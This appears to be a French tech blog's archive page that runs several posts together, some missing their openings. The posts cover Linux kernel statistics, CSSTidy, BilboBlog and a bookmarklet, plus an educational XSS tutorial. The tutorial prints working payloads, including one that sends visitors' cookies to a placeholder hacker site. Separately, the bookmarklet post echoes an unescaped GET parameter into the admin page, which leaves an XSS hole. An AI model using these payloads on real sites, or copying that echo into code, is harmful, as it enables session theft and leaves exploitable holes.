Download (389 Ko) - Source

Après lecture du document, voici quelques statistiques que l'on peut retenir :

• une release stable sort en moyenne tous les 81 jours, soit tous les 3 mois
• en 2005, la version 2.6.11 était composée de 3,616 patchs. En 2009, la version 2.6.30 compte pas moins de 11,989 patchs. Cela revient aujourd'hui à une moyenne de 6,4 patches acceptés par heure.
• le nombre d'entreprises impliquées dans le développement est passé de 68 à 240. On dénombre ainsi un total de 532 entreprises qui ont participé au projet durant ces 4 années.
• Red Hat, IBM et Novell sont les sociétés qui emploient le plus de contributeurs.
• le nombre de développeurs est quant à lui passé de 389 à 1150 personnes.
• les développeurs les plus actifs, comme David S. Miller ou Ingo Molnár (qui travaillent tous les deux pour Redhat au passage), totalisent plus de 2000 modifications chacun. Linus Torvalds est, quant à lui, loin derrière avec 729 modifications.
• en 2005, la version 2.6.11 de linux comptait 17,090 fichiers et 6,624,076 lignes de code. En 2009, avec la version 2.6.30, on est rendu à 27,911 fichiers pour 11,560,971 lignes de code. Cela représente en moyenne par jour 12,993 lignes ajoutées, 4,958 lignes supprimées et 2,830 lignes de code modifiées.

Le développement du noyau Linux est, sans aucun doute, le projet open source qui a aujourd'hui le plus de succès. Son évolution est quasi exponentielle et on peut même se demander si un jour cela ne lui portera pas préjudice. En effet, trop de contributions pourraient nuire au développement du noyau si ces dernières ne sont pas suffisamment bien encadrées. Mais, avant d'en arriver là, on ne peut que se réjouir de ce succès.

1. Optimisation

Pour installer CSSTidy, ouvrez un terminal en root et lancez la commande suivante pour une distribution à base de rpm :

yum install csstidy

Ou celle-ci pour une distribution à base de Debian :

apt-get install csstidy

Vous pourrez ensuite lancer la commande csstidy sans aucun paramètre afin de voir les options proposées. Voici quelques exemples d'optimisation possibles :

• compress_colors : utilise des codes de couleur hexadécimal, la propriété black devient #000 par exemple
• discard_invalid_properties : supprime toutes les lignes invalides. Cette option est assez dangereuse car on n'est jamais à l'abri d'une faute de frappe (widht au lieu de width)
• lowercase_s : change tous les sélecteurs en minuscule
• preserve_css : supprime tous les commentaires si l'on utilise l'option false
• remove_last_; : supprime le dernier ; de chaque section

Pour ceux qui ne veulent pas choisir d'options spécifiques, il faut savoir que CSSTidy embarque des templates capables de faire de l'optimisation automatique selon plusieurs niveaux (low, high, highest). Voici un exemple d'utilisation :

csstidy style.css --template=high style.css.out
...
Selectors: 63 | Properties: 198
Input size: 6.24KiB Output size: 3.728KiB Compression ratio: 40.27%

Si l'on compare le nombre de lignes entre les deux fichiers :

cat style.css | wc -l
368
cat style.css.out | wc -l
51

La différence avant et après compression est donc souvent très visible. Il faudra tout même revérifier sa feuille de style afin d'être sûr que le programme n'a pas commis d'erreurs ou supprimé des options importantes.

2. Compression et décompression d'une feuille de style

Si l'on souhaite ensuite compresser une feuille de style en une seule ligne, on pourra utiliser la commande suivante :

cat style.css | tr -d "\n" > compress.css

Et celle-ci pour revenir à un format lisible :

cat compress.css | awk '{gsub(/{|}|;/,"&\n"); print}' > uncompressed.css

Pour le faire fonctionner, il suffit de télécharger le fichier BilboCommentFormating.php et de le placer dans le dossier wp-content/plugins/ de votre installation WordPress.

Voici le code source du plugin :

<?php
/*
Plugin Name: BilboCommentFormating
Plugin URI: http://www.tux-planet.fr/bilbobox
Description: Formating Comments
Author: Sebastien Bilbeau
Version: 0.1
Author URI:  http://www.tux-planet.fr
*/

function BilboCommentFormating($content) {
  return preg_replace("#@(.*?) #i", "<strong>@$1</strong> ", $content);
}

add_filter('comment_text', 'BilboCommentFormating');
?>

Quelques explications :

• La première partie du code en commentaire contient les informations concernant le plugin. Elles seront affichées également dans l'interface d'administration des plugins de Worpdress.
• La fonction BilboCommentFormating s'occupe de trouver tous les mots qui commencent par @ et elle rajoute ensuite les balises <strong> autour afin de les mettre en gras.
• Enfin, la ligne add_filter permet d'appliquer la fonction BilboCommentFormating sur le contenu d'un commentaire lorsque celui-ci est posté.

Le résultat est assez surprenant puisque Fedora 9 serait ainsi évalué à 10,8 milliards de dollars pour 204,5 millions de lignes de code. Le noyau 2.6.25 totalise à lui seul 1,37 milliard de dollars pour près de 6,8 millions de lignes de code source.

Cela devient intéressant lorsque l'on compare ces résultats avec la même étude menée en 2002 sur une Red Hat Linux 7.1. A l'époque, la distribution avait été estimée à 1,2 milliard de dollars pour 30 millions de lignes de code. On note donc un forte progression du coût de développement, mais également une grosse augmentation du volume de code.

Certes, la méthode utilisée est discutable et n'est peut-être pas la meilleure. Tout d'abord parce qu'elle ne prend en compte que les rpm officiels de la distribution. Ensuite, elle ne comptabilise que l'ajout brut de code, oubliant au passage toutes les modifications ou suppressions de lignes. Le travail de développement de la communauté est donc un peu sous estimé.

L'étude reste donc très critiquable, mais elle a au moins le mérite de nous donner un ordre de grandeur sur le coût réel du développement d'une distribution linux.

1. L'installation

Dans ses premières versions, l'installation de BilboBlog a été beaucoup critiquée et certaines personnes n'ont d'ailleurs jamais pu l'installer. Ces erreurs de jeunesse ont été corrigées et BilboBlog propose maintenant un système d'installation un peu plus intelligent.

Si vous lancez l'application pour la première fois, vous serez automatiquement redirigé vers un formulaire qui vous demandera quelques informations importantes (votre email pour afficher votre gravatar, le mot de passe pour accéder à l'interface d'administration ...)

Une fois les informations saisies, l'installation se déroulera de façon automatique et vous deviez pouvoir profiter de votre micro-blog sans soucis particulier.

A noter également que la version 0.1.x de BilboBlog ne fonctionnait pas chez l'hébergeur Français Free. Le code a donc été légèrement modifié et c'est maintenant possible de l'installer sur cette plateforme. On devra tout de même suivre les indications supplémentaires contenues dans le fichier INSTALL pour y arriver.

2. L'utilisation

La caractéristique principale du micro-blogging est que l'on doit pouvoir publier très rapidement un message, une photo ou encore une vidéo. Cette nouvelle version devrait continuer à répondre à ces exigences et ceci grâce à plusieurs nouveautés.

Tout d'abord, Bilboblog supporte maintenant la syntaxe bbCode, syntaxe que l'on retrouve régulièrement dans les forums et autres outils de communication. Une barre d'outils a été ajoutée afin de simplifier son utilisation et vous pourrez par exemple mettre en forme du texte facilement.

Mais la plus grande innovation de cette nouvelle version est sans aucun doute son aspect multimédia. En effet, il est désormais possible de diffuser des images ou des vidéos (youtube, dailymotion ...) de façon simple et rapide.

 

Enfin, pour les plus expérimentés, il existe désormais un bookmarklet, qui une fois ajouté à la barre de votre navigateur Internet, vous permettra de publier instantanément vos messages. Vous pourrez trouver davantage d'informations sur cette fonctionnalité en cliquant ici.

3. Les autres nouveautés en vrac

• ajout d'une page d'aide
• ajout de divers effets ajax (zone de publication de billets, redimensionnement des images)
• possibilité de purger le cache depuis l'interface d'administration
• support des plugins
• ajout d'un permalink pour chaque publication
• possibilité d'ouvrir les publications aux visiteurs
• support de plusieurs langues (anglais et français)

1. Installation

In its first versions, the BilboBlog installation procedure was criticized and some people could not manage to install it either. These bugs have been fixed and BilboBlog offers now a new handy installation procedure.

If you run the application for the first time, you will be automatically forwarded to a form asking you important details (your email address to display your avatar, the administration interface password...)

Once the informations are entered, the installation process will progress automatically and you should take advantage of your micro-blog without any problem.

Note that the version 0.1.x of BilboBlog did not run at the french Internet service provider "Free". The source code was slightly modified and it is now possible to install it at this provider. You will have to follow the additional instructions in the INSTALL file anyway.

2. Use

The main feature of micro-bloging is to allow to publish quickly a message, a picture or a video. This new version should continue to meet this requirement thanks to many new features.

First, Bilboblog now supports the bbCode syntax, often used in forums and other communication tools. A toolbar will help you to use it so that you can format text for example.

But the biggest innovation of this new version is certainly its multimedia feature. It is now possible to spread pictures or video (youtube, dailymotion ...) easily and quickly.

 

Finally, for the most advanced users, there is now a bookmarlet, which when added to the Web browser toolbar, will give you the possibility to publish messages instantly. You will find further details about this feature here.

3. The other new features in few words

• adding a help page
• adding ajax effects (ticket publication area, picture resizing)
• cache cleaning from the administration interface
• plugins support
• adding a permalink for each publication
• visitors can now open publications
• language support (english and french)

• en tant qu'URL dans un signet avec la plupart des navigateurs web
• en tant que lien dans une page web

Pour mieux comprendre, voici un exemple de bookmarklet assez simple :

<a href="javascript:alert('Bienvenue sur '+window.location.hostname);">le bookmarklet</a>

Vous pourrez voir le résultat en cliquant sur ce lien.

Création d'un bookmarklet pour Bilboblog

A première vue le système ne présente pas beaucoup d'intérêt. Et pourtant, avec l'utilisation de javascript, les possibilités sont assez impressionnantes.

Pour ma part, je me suis intéressé à la création d'un bookmarklet pour BilboBlog (version 0.2.0 minimum), le logiciel de micro-blogging libre.

L'idée de base est de créer un lien, qui lorsque l'on clique dessus, ouvre une popup permettant de saisir un nouveau billet. J'ai donc commencé avec le code suivant :

<a href="javascript:setTimeout('p.focus();',500);p=window.open('http://tux-planet.fr/mini-blog/admin/', 'BilboBlog','height=510,width=550,location=no,menubar=no,status=no,toolbar=no');void 0">BilboBlog!</a>

Ce dernier permet d'ouvrir une popup au dessus de la page que l'on visionne. La popup possède alors le titre "BilboBlog" et est dépourvue de barres de menu et de défilement grâce aux différentes options "menubar=no,status=no,toolbar=no".

En glissant le lien dans la barre personnelle de Firefox, l'utilisateur y trouve déjà un avantage. En effet, lorsqu'il visitera une page, il pourra cliquer sur le bouton pour ouvrir une popup et commencer à écrire un article sur le sujet qu'il vient de lire.

En y réfléchissant davantage, je me suis dit que l'on pouvait aller plus loin. En effet, il est encore plus intéressant de créer un bookmarklet, capable de remplir le champ de rédaction d'un billet, avec le contenu sélectionné au préalable sur la page Internet que l'on visite.

Pour ce faire, il suffit simplement d'utiliser l'événement javascript "document.getSelection()", capable de récupérer du texte sélectionné.

J'ai ensuite modifié le code de l'interface d'administration de BilboBlog pour y remplir la zone de saisie automatiquement :

<textarea><?php if(!empty($_GET['content'])) echo trim($_GET['content']); ?></textarea>

Et enfin, j'ai adapté le bookmarklet :

<a href="javascript:setTimeout('p.focus();',500);p=window.open('http://tux-planet.fr/mini-blog/admin/?content='+document.getSelection(),'BilboBlog','height=510,width=550,location=no,
menubar=no,status=no,toolbar=no');void 0">BilboBlog!</a>

Voici un petit screencast qui montre le résultat final (également disponible en meilleure qualité et au format avi : bookmarklet.avi):

1. Quelques explications

Le Cross Site Scripting, abrégé XSS (Cross voulant dire "croix" en anglais, le symbole X a été choisi pour le représenter), est un type de faille de sécurité que l'on trouve typiquement dans les applications web.

Le principe consiste à injecter du code (html, javascript ...) directement dans les pages web. Cela se fait généralement via un formulaire à remplir, en déposant un message dans un forum, dans un moteur de recherche ou directement dans l'URL d'un site, en y ajoutant quelques paramètres.

2. Exemples d'attaques simples

Notre premier exemple, sûrement l'un des plus simples, se base sur la ligne de code suivante :

<script>alert('bonjour')</script>

Imaginons que l'on trouve un site vulnérable, qui propose par exemple de laisser un commentaire aux visiteurs. On pourra copier/coller cette ligne dans la zone de saisie. Ainsi, lors de l'affichage du commentaire le site exécutera quelque chose comme cela :

<html>
<body>
....
Votre commentaire :
<p><script>alert('bonjour')</script></p>
...
</body>
</html>

On comprend donc ici, que lors du chargement de la page, les navigateurs web seront forcés d'exécuter le code injecté pour afficher une petite boite de dialogue, contenant le message "bonjour".

A partir de là, les possibilités d'injection sont nombreuses, voir infinies. Voici quelques exemples très courants :

- rediriger tous les visiteurs vers un autre site :

<script language="javascript">document.location.href="http://site-du-hacker.com/"</script>

- afficher un contenu souhaité par le hacker (message, pubs ...) :

<script>document.write('ma pub')</script>

voler des informations aux visiteurs (cookies, sessions ...) :

<script>window.open('http://site-du-hacker.com/recupcookie.php?val='+document.cookie");</script>

3. Les attaques par URLs

Bien sûr d'autres techniques d'attaques existent. Il est par exemple possible d'injecter du code directement dans les paramètres d'une URL.

Prenons le code php suivant :

<?php
...
echo "Bienvenue ".$_GET['pseudo'];
...
?>

Une utilisation normale de l'url sera la suivante :

http://monsite.fr/?pseudo=pti-seb

Tandis qu'un utilisateur mal intentionné pourra utiliser :
http://monsite.fr/?pseudo=<script>alert("hacked by pti-seb");</script>

4. Les attaque de formulaires

Les formulaires html ne sont pas à l'abri non plus, lorsque l'on oublie de vérifier le contenu des champs envoyés par les utilisateurs.

Imaginons un moteur de recherche programmé comme celui-ci :

<form method="post" action="resultat.php">
   Chercher : <input type="text" name="valeur" />
   <input type="submit" value="Chercher" />
</form>

Un hacker pourra choisir de déporter ce formulaire en local, en prenant soin de modifier le champ "action" et d'y injecter le code voulu :

<form method="post" action="http://monsite.fr/resultat.php">
   Chercher : <input type="text" name="valeur" value="<script>alert('hacked by pti-seb')</script>" />
   <input type="submit" value="Chercher" />
</form>

Si les valeurs envoyées sont mal protégées, le moteur de recherche affichera ce message :
Aucun résultat trouvé pour "<script>alert('hacked by pti-seb')</script>"

5. Les solutions

Une première solution pour contrer ces attaques, serait tout simplement d'interdire l'utilisation de la balise html <script>. Mais cela n'est pas suffisant, car on peut contourner facilement la protection en utilisant d'autres balises html, comme la balise iframe :

<iframe src="http://site-du-hacker.com"></iframe>

Il est donc plus prudent d'interdire toute utilisation de balises html. La fonction Php strip_tags() permet de faire cela et peut aller plus loin en autorisant seulement certaines balises. On pourra aussi utiliser une fonction similaire à celle-ci, qui s'occupe de neutraliser toutes les balises html :

function antiXss($chaine) {
   $chaine = str_replace("<", "", $chaine);
   return str_replace(">", "", $chaine);
}

Mais là encore, cette méthode est insuffisante face aux exploits n'utilisant aucune balise. Pour mieux comprendre, regardons ce code, qui ne possède aucune protection :

<?php
...
echo 'Votre image : <img src="'.$_GET['filename'].'" />';
...
?>

Une utilisation normale sera :

http://monsite.fr/?filename=/public/images/photos/informatique/windows/vista.jpg

Ce qui donnera en php :

echo 'Votre image : <img src="/public/images/photos/informatique/windows/vista.jpg" />';

Tandis qu'une utilisation mal intentionnée pourra être :
http://monsite.fr/?filename="onerror="alert('hacked by pti-seb')"a=".jpg

Ce qui donnera en php :

echo 'Votre image : <img src=""onerror="alert('hacked by pti-seb')"a=".jpg" />';

La source de l'image n'existant pas, le navigateur exécutera l'événement javascript onError.

La solution pour contrer tous ces exploits reste sans doute l'utilisation de la fonction Php htmlentities. En plus de neutraliser les balises, elle est capable de convertir les guillemets simples et doubles en code html et de détecter l'utilisation d'encodages différents. Voici un exemple :

function antiXss($chaine) {
   return htmlentities($chaine, ENT_QUOTES);
}

6. Conclusion

Ils existent bien sûr une multitude de techniques d'injection de code qui n'ont pas été vues ici. Lors d'un développement web, à chaque fois que l'internaute pourra saisir une donnée dans un formulaire ou autre, la question du XSS se posera systématiquement.

Il faudra donc de tester soigneusement chaque zone de saisie ou chaque paramètre d'URL afin de sécuriser au mieux son site web.

What is a microblog?

A small definition found on Internet will help to better understand this word:
"The microblog is a derivate of the blog that allows you to send messages in a short format (less than 200 characters) and to share your knowledge with any people."

If you missed the starting of this mini-blog, it's possible to read it below (in french only):
Tux-planet launches his mini-blog.

Downloading and installing

You can download the latest version of bilboblog here. To install, you should simply follow the instructions of the INSTALL file, provided with the software.

Features of this version

Here is the list of key features:

• Incorporates management gravatars
• supports special encodings
• It has an administration interface for writing new articles or delete them
• There is a management system cache
• Manages Atom feeds

The source code

The full source code is distributed under the free License AGPLv3 (= Affero GPLv3). This one is the resumption of the GPLv3 with a slight change in order to adapt it to better networking applications.

Please, observe:

• The terms of that license (AGPLv3)
• Any changes to redistribute the program under the same license
• To leave the link at the bottom of page to the author's website

Ideas for improvements

If you want to take part of the project, here are some ideas for possible improvements.

• Addition of a management system for multiple languages
• Addition of a management system plugins
• Creation of a Firefox's plugin to post new articles directly from the browser without going through the administration interface
• Creation of new themes, logo, buttons promotion
• ...

You should keep in mind that micro-blogging concept is based on very short articles and quickly writing. This mini-blog has been developed using 3 mains lines : safety, lightness and speed. Any changes or improvements should follow these rules to provide a quality application.